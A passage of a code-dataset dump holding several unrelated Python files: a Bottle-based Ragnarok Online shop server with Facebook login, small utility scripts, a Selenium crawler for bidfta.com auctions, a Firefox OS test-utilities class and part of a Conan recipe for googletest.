template_file.read()\n cf_template = partition_formatter.format(template, partitions=partitions)\n with open(output_file_name, 'w') as output_file:\n output_file.write(cf_template)\n\n","sub_path":"ats-search-index-generate-template.py","file_name":"ats-search-index-generate-template.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"303118227","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n\n\"\"\"server.py: TODO\"\"\"\n\nimport datetime\nimport math\nimport os\n\nimport bottle as app\nimport rauth\nfrom beaker.middleware import SessionMiddleware\n\nimport config\nimport html\nimport models\n\noauth2 = rauth.OAuth2Service\nfacebook = oauth2(\n client_id=config.FB_APP_ID,\n client_secret=config.FB_APP_SECRET,\n name='facebook',\n authorize_url='https://graph.facebook.com/oauth/authorize',\n access_token_url='https://graph.facebook.com/oauth/access_token',\n base_url='https://graph.facebook.com/'\n)\n\nif config.DEBUG:\n uri_pattern = '{uri}:{port}/success'\nelse:\n uri_pattern = '{uri}/success'\n\nredirect_uri = uri_pattern.format(uri=config.BASE_URI, port=config.PORT)\n\ndef authenticate(func):\n def log_in(*args, **kwargs):\n logged_in = app.request.session.get('logged_in')\n user_id = app.request.session.get('user_id')\n shop_id = app.request.session.get('shop_id')\n\n if logged_in and user_id and shop_id:\n return func(*args, **kwargs)\n\n app.redirect('/login')\n\n return log_in\n\ndef diff_date(time):\n # Awesome snippet from this guy: http://goo.gl/LXQORG\n now = datetime.datetime.now()\n\n if type(time) is int:\n diff = now - datetime.datetime.fromtimestamp(time)\n elif isinstance(time, datetime.datetime):\n diff = now - time\n elif not time:\n diff = now - now\n\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return 'just now'\n if second_diff < 60:\n return str(second_diff) + ' seconds ago'\n if second_diff < 120:\n return 'a minute ago'\n if second_diff < 3600:\n return str( second_diff / 60 ) + ' minutes ago'\n if second_diff < 7200:\n return 'an hour ago'\n if second_diff < 86400:\n return str( second_diff / 3600 ) + ' hours ago'\n\n if day_diff == 1:\n return 'Yesterday'\n if day_diff < 7:\n return str(day_diff) + ' days ago'\n if day_diff < 31:\n return str(day_diff/7) + ' weeks ago'\n if day_diff < 365:\n return str(day_diff/30) + ' months ago'\n\n return str(day_diff/365) + ' years ago'\n\ndef paginator(list_, per_page=10):\n total_count = len(list_)\n pages_count = int(math.ceil(total_count / float(per_page)))\n start_count, end_count = 0, per_page\n pages = [None] # 1st index is None since pagination always starts at 1 not 0\n\n if per_page > total_count:\n end_count = total_count\n\n for i in range(1, pages_count + 1):\n pages.append(list_[start_count:end_count])\n\n if start_count <= total_count:\n start_count += per_page\n\n if end_count <= total_count:\n end_count += per_page\n\n return pages\n\ndef paginator_prev(list_, current_index):\n try:\n if current_index:\n current = list_[current_index]\n previous = list_[current_index-1] or False\n return previous\n except:\n pass\n\n return False\n\ndef paginator_next(list_, current_index):\n try:\n current = list_[current_index]\n next_ = list_[current_index+1]\n return next_\n except:\n return False\n\n@app.hook('before_request')\ndef global_session():\n app.request.session = app.request.environ.get('beaker.session')\n\n reload(html)\n\n@app.get('/')\ndef index(page_num):\n if not page_num:\n page_num = 1\n else:\n page_num = int(page_num.split('/')[1])\n\n if int(page_num) <= 1:\n app.redirect('/')\n\n pagination_slug = ''\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n diff_date = globals()['diff_date']\n list_types = config.LIST_TYPES\n cdn = config.CDN\n items = (\n models.session.query(models.Item, models.Shop, models.User)\n .join(models.Shop, models.Shop.id == models.Item.shop_id)\n .join(models.User, models.User.id == models.Shop.user_id)\n .order_by(models.Item.id.desc())\n ).all()\n paginated_pages = paginator(items, 10)\n paginated_indexes = range(0, len(paginated_pages))\n paginated_prev = paginator_prev(paginated_indexes, page_num)\n paginated_next = paginator_next(paginated_indexes, page_num)\n return app.template('index', html=html, **locals())\n\n@app.get('/login<:re:/?>')\ndef login():\n app.redirect(\n facebook.get_authorize_url(\n **dict(\n # scope='email,public_profile',\n scope='public_profile',\n response_type='code',\n redirect_uri=redirect_uri\n )\n )\n )\n\n@app.get('/success<:re:/?>')\ndef login_success():\n try:\n code = app.request.params.get('code')\n session = facebook.get_auth_session(\n data=dict(\n code=code,\n redirect_uri=redirect_uri\n )\n )\n session_json = session.get('me').json()\n user_data = (\n dict(\n (k, unicode(v).encode('utf-8'))\n for k, v in session_json.iteritems()\n )\n )\n app.request.session['logged_in'] = True\n app.request.session['user_data'] = user_data\n except:\n return 'An error have occured, please contact the Webmaster.'\n\n user = (\n models.session.query(models.User)\n .filter_by(uid=user_data['id'])\n .first()\n )\n\n if user:\n app.request.session['user_id'] = user.id\n app.request.session['user_slug'] = user.slug\n shop = (\n models.session.query(models.Shop)\n .filter_by(user_id=user.id)\n .first()\n )\n\n if shop:\n app.request.session['shop_id'] = shop.id\n item = (\n models.session.query(models.Item)\n .filter_by(shop_id=shop.id)\n .first()\n )\n\n if not item:\n new_item = models.Item(\n icon_id=909,\n name='Jellopy',\n price='10z',\n trade='Clover or ???',\n amount=1,\n list_type=0,\n created=datetime.datetime.now(),\n shop_id=shop.id\n )\n\n models.session.add(new_item)\n else:\n shop_name = '{name}\\'s Shop'.format(name=user_data['name'])\n server_name = 'My Ragnarok Online'\n new_shop = models.Shop(\n name=shop_name,\n server=server_name,\n ingame='',\n email='',\n mobile='',\n user_id=user.id\n )\n\n models.session.add(new_shop)\n else:\n new_user = models.User(\n uid=user_data['id'],\n email='', # user_data['email'],\n name=user_data['name'],\n slug=user_data['id']\n )\n\n models.session.add(new_user)\n\n models.session.commit()\n app.redirect('/profile')\n\n@app.route('/profile<:re:/?>', method=['POST', 'GET'])\n@authenticate\ndef profile():\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n tab = app.request.query.get('tab')\n valid_tabs = ['shop', 'items', 'settings']\n list_types = config.LIST_TYPES\n cdn = config.CDN\n result = {'type': '', 'title': '', 'message': ''}\n\n if not tab or tab not in valid_tabs:\n app.redirect('/profile?tab=shop')\n\n user_data = app.request.session.get('user_data')\n user_id = app.request.session.get('user_id')\n shop_id = app.request.session.get('shop_id')\n update = app.request.forms.get('update')\n\n # Tab: Shop\n shop = models.session.query(models.Shop).filter_by(id=shop_id).first()\n shop_name = app.request.forms.get('shop_name')\n server = app.request.forms.get('server')\n ingame = app.request.forms.get('ingame')\n email = app.request.forms.get('email')\n mobile = app.request.forms.get('mobile')\n\n if shop:\n shop_name = shop_name or shop.name\n server = server or shop.server\n ingame = ingame or shop.ingame\n email = email or shop.email\n mobile = mobile or shop.mobile\n\n # Tab: Items -> New Item\n new_item_list_type = app.request.forms.get('new_item_list_type')\n new_item_icon_id = app.request.forms.get('new_item_icon_id') or ''\n new_item_name = app.request.forms.get('new_item_name') or ''\n new_item_price = app.request.forms.get('new_item_price') or ''\n new_item_trade = app.request.forms.get('new_item_trade') or ''\n new_item_amount = app.request.forms.get('new_item_amount') or 1\n add = app.request.forms.get('add')\n\n # Tab: Items -> Existing Items\n select_all = app.request.query.get('select_all')\n items_selected = app.request.forms.getall('item_selected')\n item_list_types = app.request.forms.getall('item_list_type')\n item_icon_ids = app.request.forms.getall('item_icon_id') or ''\n item_ids = app.request.forms.getall('item_id') or ''\n item_names = app.request.forms.getall('item_name') or ''\n item_prices = app.request.forms.getall('item_price') or ''\n item_trades = app.request.forms.getall('item_trade') or ''\n item_amounts = app.request.forms.getall('item_amount') or ''\n remove = app.request.forms.get('remove')\n\n # Tab: Settings\n user = models.session.query(models.User).filter_by(id=user_id).first()\n slug = app.request.forms.get('slug')\n name = app.request.forms.get('name')\n\n if user:\n name = name or user.name\n slug = slug or user.slug\n user_slug = slug\n\n if update:\n if tab == 'shop':\n result.update(\n type='success',\n title='Congratulations!',\n message='Shop successfully updated.'\n )\n\n shop.name = shop_name\n shop.server = server\n shop.ingame = ingame\n shop.email = email\n shop.mobile = mobile\n elif tab == 'items':\n for i, j in enumerate(item_ids):\n item = models.session.query(models.Item).filter_by(id=j).first()\n\n if not item_names[i]:\n item_names[i] = item.name\n elif int(item_list_types[i]) <= 1 and not item_prices[i]:\n item_prices[i] = item.price\n elif int(item_list_types[i]) == 2 and not item_trades[i]:\n item_trades[i] = item.trade\n elif not item_amounts[i]:\n item_amounts[i] = item.amount\n\n item.icon_id = item_icon_ids[i].strip()\n item.name = item_names[i]\n item.price = item_prices[i]\n item.trade = item_trades[i]\n item.amount = item_amounts[i]\n item.list_type = item_list_types[i]\n item.modified = datetime.datetime.now()\n item.shop_id = shop_id\n\n if not item_ids:\n result.update(\n type='warning',\n title='Failed to update items:',\n message='There is no item to update.'\n )\n else:\n result.update(\n type='success',\n title='Congratulations!',\n message='All items successfully updated.'\n )\n elif tab == 'settings':\n existing_user = (\n models.session.query(models.User)\n .filter(\n models.orm.or_(\n models.User.name == name,\n models.User.slug == slug\n )\n ).first()\n )\n\n if existing_user:\n if existing_user.id != user.id:\n result.update(\n type='error',\n title='Failed to update settings:'\n )\n\n if existing_user.name == name:\n result['message'] = 'Name already exists'\n elif existing_user.slug == slug:\n result['message'] = 'Slug already exists'\n\n if not result['type']:\n result.update(\n type='success',\n title='Congratulations!',\n message='Settings successfully updated.'\n )\n\n user.name = name\n user.slug = slug\n\n if add:\n # Make new_item_list_type to 0 when intentionally modified:\n if new_item_list_type not in ['0', '1', '2']:\n new_item_list_type = '0'\n\n if (\n not new_item_name or int(new_item_list_type) <= 1\n and not new_item_price or int(new_item_list_type) == 2\n and not new_item_trade\n ):\n result.update(\n type='error',\n title='Failed to add item:'\n )\n\n if not new_item_name:\n result['message'] = 'Item Name is required.'\n elif int(new_item_list_type) <= 1 and not new_item_price:\n result['message'] = 'Item Price is required.'\n elif int(new_item_list_type) == 2 and not new_item_trade:\n result['message'] = 'Item to Trade is required.'\n else:\n result.update(\n type='success',\n title='Congratulations!',\n message='Item successfully added.'\n )\n new_item = models.Item(\n icon_id=new_item_icon_id.strip(),\n name=new_item_name,\n price=new_item_price,\n trade=new_item_trade,\n amount=new_item_amount,\n list_type=new_item_list_type,\n shop_id=shop_id\n )\n\n models.session.add(new_item)\n\n # Empty fields once successful (except for amount set to 1):\n new_item_icon_id = ''\n new_item_name = ''\n new_item_price = ''\n new_item_trade = ''\n new_item_amount = 1\n\n if remove:\n if not items_selected:\n result.update(\n type='warning',\n title='Failed to remove an item:',\n message='No item was selected.'\n )\n else:\n result.update(\n type='success',\n title='Congratulations',\n message='Selected items successfully removed.'\n )\n\n for item in items_selected:\n (\n models.session.query(models.Item)\n .filter(models.Item.id == item)\n .filter(models.Item.shop_id == shop_id)\n .delete()\n )\n\n if update or add or remove:\n models.session.commit()\n\n if update and tab == 'settings':\n app.request.session['user_slug'] = slug\n\n tpl = 'profile_{}'.format(tab)\n items = models.session.query(models.Item).filter_by(shop_id=shop_id).all()\n return app.template(tpl, html=html, **locals())\n\n@app.get('/<:re:/?>')\ndef user(slug, page_num):\n if not page_num:\n page_num = 1\n else:\n page_num = int(filter(None, page_num.split('/'))[1])\n\n if int(page_num) <= 1:\n app.redirect('/' + slug)\n\n pagination_slug = '/' + slug\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n diff_date = globals()['diff_date']\n list_types = config.LIST_TYPES\n cdn = config.CDN\n user = (\n models.session.query(models.User)\n .filter_by(slug=slug)\n .join(models.Shop)\n .join(models.Item)\n .first()\n )\n\n if not user:\n app.abort(404)\n\n paginated_pages = paginator(user.shop.items, 10)\n paginated_indexes = range(0, len(paginated_pages))\n paginated_prev = paginator_prev(paginated_indexes, page_num)\n paginated_next = paginator_next(paginated_indexes, page_num)\n\n return app.template('user', html=html, **locals())\n\n@app.get('/favicon.ico')\ndef favicon():\n root = os.path.join(os.path.dirname(__file__), 'static')\n return app.static_file('favicon.ico', root=root)\n\n@app.get('/logout')\ndef logout():\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n\n app.request.session.delete()\n app.redirect('/')\n\n@app.get('//')\ndef static(path, file_):\n root = os.path.join(os.path.dirname(__file__), 'static')\n return app.static_file(file_, root=root + '/' + path)\n\n@app.error(404)\n@app.error(500)\ndef page_404(error):\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n return app.template('404', html=html, **locals())\n\napp.run(\n server=config.SERVER,\n host=config.HOST,\n port=config.PORT,\n debug=config.DEBUG,\n reloader=config.RELOADER,\n app=SessionMiddleware(app.app(), {\n 'session.data_dir': config.SESSION,\n 'session.type': config.SESSION_TYPE,\n 'session.auto': config.SESSION_AUTO\n })\n)\n","sub_path":"py/ragnashop/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"119327741","text":"# Store the admission prices as constants\r\nBABY_PRICE = 0.00\r\nCHILD_PRICE = 14.00\r\nADULT_PRICE = 23.00\r\nSENIOR_PRICE = 18.00\r\n\r\n\r\n# Store the age limits as constants\r\nBABY_LIMIT = 2\r\nCHILD_LIMIT = 12\r\nADULT_LIMIT = 64\r\n\r\n# Create a variable to hold the total admission cost for all guests in a group\r\ntotal = 0\r\n\r\n# Keep on reading ages until the user enters a blank line\r\nline = input(\"Enter the age of the guest (blank to finish): \")\r\nwhile line != \"\":\r\n age = int(line)\r\n\r\n\r\n # Add the correct amount to the total\r\n if age <= BABY_LIMIT:\r\n total = total + BABY_PRICE\r\n elif age <= CHILD_LIMIT:\r\n total = total + CHILD_PRICE\r\n elif age <= ADULT_LIMIT:\r\n total = total + ADULT_PRICE\r\n else:\r\n total = total + SENIOR_PRICE\r\n\r\n # Read the next line from the user\r\n line = input(\"Enter the age for the guest (blank to finish): \")\r\n\r\n# Display the total due for the group formatted using two decimal places\r\nprint(\"The total for that group is £%.2f\" % total)\r\n \r\n","sub_path":"AdmissionPrice.py","file_name":"AdmissionPrice.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"607432700","text":"from PageObject.basepage import BasePage\nfrom time import sleep\n\n\nclass SendEmailPage(BasePage):\n \"\"\"写信Page\"\"\"\n def write_button(self):\n # 点击写信\n sleep(2)\n el_wl = self.by_xpath(\"//span[text() = '写 信']/parent::li\")\n el_wl.click()\n\n def write_letter(self, email, topic, text):\n # 编辑信件\n sleep(2)\n if email:\n el_mail = self.by_xpath(\"//*[@title = '发给多人时地址请以分号隔开']/child::div/input\")\n el_mail.send_keys(email)\n if topic:\n el_topic = self.by_xpath(\"//*[@aria-label = '邮件主题输入框,请输入邮件主题']/child::input\")\n el_topic.send_keys(topic)\n # 进入编辑正文表单\n text_iframe = self.by_class(\"APP-editor-iframe\")\n self.driver.switch_to.frame(text_iframe)\n if text:\n el_text = self.by_xpath(\"//*[text() = '编辑邮件正文']/ancestor::html/child::body\")\n el_text.send_keys(text)\n\n def send_button(self):\n # 点击发送\n sleep(2)\n # 回到最外层页面\n self.driver.switch_to.default_content()\n el_send = self.by_xpath(\"//span[text() = '发送']\")\n el_send.click()\n","sub_path":"PageObject/sendemailpage.py","file_name":"sendemailpage.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"221739927","text":"# coding: utf-8\nfrom utils import CSVScraper\n\n\nclass OttawaPersonScraper(CSVScraper):\n csv_url = 'http://data.ottawa.ca/en/dataset/fd26ae83-fe1a-40d8-8951-72df40021c82/resource/33a437d3-a06d-4c56-a7fe-4fd622364ce6/download/elected-officials-282014-201829-v.2.csv'\n corrections = {\n 'district name': {\n \"Orl\\u0082ans\": 'Orléans',\n },\n }\n","sub_path":"ca_on_ottawa/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632341270","text":"from bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nimport urllib.request\r\nimport time\r\nimport pandas as pd\r\nimport database\r\n\r\n#Debug\r\nimport time\r\n\r\n#Define\r\nbid_fta_all_auctions = 'https://www.bidfta.com/home'\r\n\r\ndef change_page(driver,wait,page_num):\r\n\tpage_input = driver.find_element_by_id(\"pageInput\")\r\n\tpage_input.send_keys(page_num)\r\n\t\r\n\t#Click Go button\r\n\tgo_button = driver.find_element_by_id(\"pagebtn\")\r\n\tgo_button.click()\r\n\r\n\t#Wait for loading overlay\r\n\tloadingOverlay = driver.find_element_by_class_name(\"overlay\")\r\n\twait.until(EC.invisibility_of_element_located(loadingOverlay))\r\n\ttime.sleep(.5)\r\n\r\ndef clean_up(driver):\r\n\tdriver.quit()\r\n\r\ndef filter_auctions_by_warehouse_city(driver,wait,bid_fta_all_auctions,city,state):\r\n\t#Open the Webpage\r\n\tdriver.get(bid_fta_all_auctions)\r\n\r\n\t#Expand the warehouse location dropdown\r\n\tclickable_warehouse_dropdown = driver.find_element_by_xpath(\"//*[@class='multiselect dropdown-toggle btn btn-default']\")\r\n\tclickable_warehouse_dropdown.click()\r\n\r\n\t#Find all the dropdown options\r\n\twarehouse_dropdown = driver.find_element_by_xpath(\"//*[@class='multiselect-container dropdown-menu']\")\r\n\r\n\t#Expand the state\r\n\t#warehouse_states = warehouse_dropdown.find_elements_by_xpath(\"//*[@class='multiselect-item multiselect-group']\")\r\n\twarehouse_states = warehouse_dropdown.find_elements_by_tag_name(\"li\")\r\n\r\n\t#Loop through the states for any containing the state of interest and expand them\r\n\tfor warehouse_state in warehouse_states:\r\n\t\twarehouse_state_name = warehouse_state.text\r\n\t\tif state in warehouse_state_name:\r\n\t\t\twarehouse_state_caret = warehouse_state.find_element_by_class_name(\"caret-container\")\r\n\t\t\twarehouse_state_caret.click()\r\n\t\t\tbreak\r\n\t\t\t#Will delete below, current design dictates a new browser session is always opened.\r\n\t\t\t#Checks that the warehouse location isnt already selected since we dont want it to de-select it\r\n\t\t\t#warehouse_state_checkbox = warehouse_state.get_attribute()\r\n\t\t\t#if \"active\" not in warehouse_state_checkbox:\r\n\t\t\t#\twarehouse_state.click()\r\n\r\n\t#Find the City\r\n\twarehouses = warehouse_dropdown.find_elements_by_tag_name(\"a\")\r\n\r\n\t#Loop through the warehouse locations for any containing the city of interest and select them\r\n\tfor warehouse in warehouses:\r\n\t\twarehouse_location = warehouse.find_elements_by_class_name(\"checkbox\")\r\n\t\tif len(warehouse_location) > 0:\r\n\t\t\twarehouse_location_name = warehouse_location[0].get_attribute(\"title\")\r\n\t\t\tif city in warehouse_location_name:\r\n\t\t\t\t#Checks that the warehouse location isnt already selected since we dont want it to de-select it\r\n\t\t\t\twarehouse_location_classes = warehouse.get_attribute(\"class\")\r\n\t\t\t\tif \"active\" not in warehouse_location_classes:\r\n\t\t\t\t\twarehouse.click()\r\n\t\t\r\n\t#Click the filter button\r\n\tfilter_button = driver.find_element_by_xpath(\"//*[@class='btn btn-lg btn-style filter-btn']\")\r\n\tfilter_button.click()\r\n\r\n\t#Wait for loading overlay\r\n\tloadingOverlay = driver.find_element_by_class_name(\"overlay\")\r\n\twait.until(EC.invisibility_of_element_located(loadingOverlay))\r\n\ttime.sleep(1)\r\n\r\ndef get_all_auctions_on_page (driver,wait):\r\n\t#Print all auction results on page bidfta.com/home\r\n\tauction_dictionary = {}\r\n\tauction_details = []\r\n\tall_auctions = driver.find_elements_by_xpath(\"//div[starts-with(@id,'auctionContainer')]\")\r\n\r\n\t#Record details for each auction\r\n\tfor each_auction in all_auctions:\r\n\t\tauction_id = each_auction.find_element_by_xpath(\".//p[starts-with(text(),'Auction:')]\").text.split(': ')[1]\r\n\t\tauction_end = each_auction.find_element_by_xpath(\".//div[contains(@class,'endTime')]\").text\r\n\t\tauction_time_remaining = each_auction.find_element_by_xpath(\".//span[starts-with(@id,'time')]\").text\r\n\t\tauction_link = each_auction.find_element_by_xpath(\".//a[starts-with(@href,'/auctionDetails')]\").get_attribute(\"href\")\r\n\t\tauction_details = [auction_end,auction_time_remaining,auction_link]\r\n\t\tauction_dictionary[auction_id] = auction_details\r\n\r\n\treturn auction_dictionary\r\n\t\r\ndef get_total_pages (driver,wait):\r\n\t#total_pages = driver.find_element_by_xpath(\"//span[@class='total total_page']\")\r\n\ttotal_pages = wait.until(EC.presence_of_element_located((By.XPATH, \"//span[@class='total total_page']\")))\r\n\r\n\treturn int(total_pages.text)\r\n\r\ndef navigate_to_auction_items_by_auction_id(driver,auction_id,auction_dictionary):\r\n\t#Get auction dictionary items\r\n\tauction_details = auction_dictionary.get(auction_id)\r\n\tauction_link = auction_details[2]\r\n\tauction_link_num = auction_link[-5:]\r\n\tauction_items_link = \"https://www.bidfta.com/auctionItems?listView=true&idauctions=\" + auction_link_num + \"&pageId=1\"\r\n\tdriver.get(auction_items_link)\r\n\r\ndef get_all_items_on_page(driver,wait_halfsec):\r\n\titem_dictionary = {}\r\n\titem_details = []\r\n\tall_items_on_page = driver.find_elements_by_xpath(\"//div[starts-with(@id,'itemContainer')]\")\r\n\r\n\t#Record details for each auction\r\n\tfor each_item in all_items_on_page:\r\n\t\t#Find the item details we are interested in\r\n\t\titem_lot_id = each_item.find_element_by_xpath(\".//span[starts-with(@id,'lotcode')]\").text\r\n\t\titem_description = each_item.find_element_by_xpath(\".//p[contains(@class,'title')]\").text\r\n\t\titem_status = each_item.find_element_by_xpath(\".//p[contains(@class,'itemStatus')]\").text\r\n\t\titem_current_bid = each_item.find_element_by_xpath(\".//span[starts-with(@id,'currentBid')]\").text.split('$')[1]\r\n\t\twait_halfsec = WebDriverWait(each_item, .5)\r\n\t\ttry:\r\n\t\t\titem_msrp_raw = wait_halfsec.until(EC.presence_of_element_located((By.XPATH, \".//div[contains(@class,'text-right')]\"))).text\r\n\t\t\tif item_msrp_raw:\r\n\t\t\t\titem_msrp = item_msrp_raw.split('$ ')[1]\r\n\t\t\telse:\r\n\t\t\t\titem_msrp = None\r\n\t\t\t#print(item_msrp)\r\n\t\texcept:\r\n\t\t\tprint(\"no msrp container\")\r\n\t\titem_msrp = None\r\n\t\titem_link = each_item.find_element_by_xpath(\".//a[starts-with(@href,'/itemDetails')]\").get_attribute(\"href\")\r\n\r\n\t\t#Use the lot_id as a key and the rest of the details as values\r\n\t\titem_details = [item_description,item_status,item_current_bid,item_msrp,item_link]\r\n\t\titem_dictionary[item_lot_id] = item_details\r\n\r\n\treturn item_dictionary\r\n\r\ndef get_all_items_by_auction_id(driver,wait5,wait_halfsec,auction_id,auction_dictionary):\r\n\t#Navigate to item page for a specific auction\r\n\tnavigate_to_auction_items_by_auction_id(driver,auction_id,auction_dictionary)\r\n\r\n\t#Get the number of result pages\r\n\ttotal_result_pages = get_total_pages (driver,wait5)\r\n\r\n\t#Scan all pages and pull auction info into new dictionary\r\n\tall_items_dict = {}\r\n\tfor i in range(2, total_result_pages+1):\r\n\t\tall_items_dict.update(get_all_items_on_page(driver,wait_halfsec))\r\n\t\tchange_page(driver,wait5,i)\r\n\r\n\t#Get final page\r\n\tall_items_dict.update(get_all_items_on_page(driver,wait_halfsec))\r\n\r\n\treturn all_items_dict\r\n\r\n#Finish building this function to loop through all auctions and get items.\r\ndef add_items_to_all_auctions(driver,wait5,wait_halfsec,auction_dictionary,connection):\r\n\t#Create a cursor for database entries\r\n\tcursor = connection.cursor()\r\n\r\n\t#Add auction details to database\r\n\tdatabase.add_auction_details_to_database(auction_dictionary,cursor)\r\n\tconnection.commit()\r\n\r\n\t#Debug\r\n\tcounter = 0\r\n\tfor key in auction_dictionary.keys():\r\n\t\t#Debug\r\n\t\tstart_time = time.time()\r\n\t\tcounter += 1\r\n\t\t\r\n\t\t#Get auction items by auction id\r\n\t\tauction_id_value = key\r\n\t\tall_items_for_auction = get_all_items_by_auction_id(driver,wait5,wait_halfsec,auction_id_value,auction_dictionary)\r\n\t\t\r\n\t\t#Add auction items to database\r\n\t\tdatabase.add_items_to_database(all_items_for_auction,auction_id_value,cursor)\r\n\t\tconnection.commit()\r\n\r\n\t\t#Debug\r\n\t\tprint(key)\r\n\t\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\t\tprint(str((time.time() - start_time)/(len(all_items_for_auction))) + \" seconds per item with \" + str(len(all_items_for_auction)) + \" total items.\") \r\n\t\tprint(str(counter) + \" of \" + str(len(auction_dictionary.keys())))\r\n\r\n\t#Close the cursor\r\n\tcursor.close()\r\n\r\n\treturn None\r\n\r\ndef find_all_auctions_by_city(driver,wait5,city,state):\r\n\tauction_dictionary = {}\r\n\tfilter_auctions_by_warehouse_city(driver,wait5,bid_fta_all_auctions,city,state)\r\n\t#Get the number of result pages\r\n\ttotal_result_pages = get_total_pages (driver,wait5)\r\n\t#Scan all pages and pull auction info\r\n\tfor i in range(2, total_result_pages+1):\r\n\t\tauction_dictionary.update(get_all_auctions_on_page(driver,wait5))\r\n\t\tchange_page(driver,wait5,i)\r\n\t#Get final page\r\n\tauction_dictionary.update(get_all_auctions_on_page(driver,wait5))\r\n\r\n\treturn auction_dictionary\r\n\r\ndef setup_driver (headless,browser,implicitly_wait):\r\n\tif headless:\r\n\t\tdriver_options = Options()\r\n\t\tdriver_options.headless = True\r\n\t\tdriver = webdriver.Firefox(options=driver_options)\r\n\telse:\r\n\t\tdriver = webdriver.Firefox()\r\n\t\r\n\t#actions = ActionChains(driver)\r\n\t#Wait time when using explicit wait\r\n\twait5 = WebDriverWait(driver, 10)\r\n\twait_halfsec = WebDriverWait(driver, 1)\r\n\tdriver.implicitly_wait(implicitly_wait)\r\n\r\n\treturn driver,wait5,wait_halfsec","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31552962","text":"from OWDTestToolkit.global_imports import *\n\nimport app ,\\\n debug ,\\\n element ,\\\n general ,\\\n home ,\\\n iframe ,\\\n network ,\\\n reporting ,\\\n statusbar ,\\\n test\n\n\nclass UTILS(app.main ,\n debug.main ,\n element.main ,\n general.main ,\n home.main ,\n iframe.main ,\n network.main ,\n reporting.main ,\n statusbar.main ,\n test.main):\n #\n # When you create your instance of this class, include the\n # \"self\" object so we can access the calling class' objects.\n #\n def __init__(self, p_parent):\n self.parent = p_parent\n self.device = p_parent.device\n self.data_layer = p_parent.data_layer\n self.apps = p_parent.apps\n self.marionette = p_parent.marionette\n self.actions = Actions(self.marionette)\n\n #\n # Globals used for reporting ...\n #\n self._resultArray = []\n self._commentArray = []\n self.errNum = 0\n self.passed = 0\n self.failed = 0\n self.start_time = time.time()\n self.last_timestamp = time.time()\n \n #\n # Other globals ...\n #\n self._DEFAULT_ELEMENT_TIMEOUT = 5\n\n #\n # Get run details from the OS.\n #\n self.testNum = self.get_os_variable(\"TEST_NAME\")\n self.testDesc = self.get_os_variable(\"TEST_DESC\")\n self.det_fnam = self.get_os_variable(\"DET_FILE\")\n self.sum_fnam = self.get_os_variable(\"SUM_FILE\")\n \n #\n # Default device to 'silent + vibrate'.\n #\n self.data_layer.set_setting(\"vibration.enabled\", True)\n self.data_layer.set_setting(\"audio.volume.notification\", 0)\n \n #\n # Default permissions.\n #\n self.apps.set_permission('Camera', 'geolocation', 'deny')\n\n \n #\n # Default timeout for element searches.\n #\n self.marionette.set_search_timeout(20)\n \n #\n # Set the current time to 'now'.\n #\n self.setTimeToNow()\n \n #\n # Unlock (if necessary).\n #\n self.parent.lockscreen.unlock()","sub_path":"OWDTestToolkit/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292460069","text":"import os\nfrom conans import ConanFile, CMake, tools\n\n\nclass CryptoPPConan(ConanFile):\n name = 'googletest'\n version = '1.8.1'\n url = 'https://github.com/wsbu/conan-packages'\n description = \"Google's C++ test framework.\"\n settings = 'os', 'compiler', 'build_type', 'arch'\n license = 'BSD 3-clause \"New\" or \"Revised\" License'\n options = {\n 'shared': [True, False],\n 'run_tests': [True, False]\n }\n default_options = 'shared=False', 'run_tests=False'\n generators = 'cmake'\n\n def source(self):\n self.run('git clone --depth=1 https://github.com/google/googletest.git -b release-' + self.version)\n\n def build(self):\n source_dir = os.path.join(self.build_folder, 'googletest')\n build_dir = os.path.join(self.build_folder, 'build')\n\n # Without this, CMake won't know how to find the dependencies that Conan is trying to inject\n # Also, set the `conan_output_dirs_setup()` macro to empty or else unit tests will fail\n tools.replace_in_file(os.path.join(source_dir, 'CMakeLists.txt'), 'project(googletest-distribution)',\n '''project(googletest-distribution)\ninclude(\"{0}/conanbuildinfo.cmake\")\nmacro(conan_output_dirs_setup)\nendmacro()\nconan_basic_setup()'''.format(self.build_folder))\n\n cmake = CMake(self)\n cmake.definitions['CMAKE_INSTALL_PREFIX'] = '/'\n\n if tools.cross_building(self.settings) or not self.options.run_tests:\n extra_definitions = {}\n else:\n extra_definitions = {\n 'gtest_build_tests': 'TRUE',\n 'gmock_build_tests': 'TRUE'\n }\n cmake.configure(source_dir=source_dir, build_dir=build_dir, defs=extra_definitions)\n cmake.build()\n if not tools.cross_building(self.settings) and self.options.run_tests:\n # Exclusion due to https://github.com/google/googletest/issues/845\n 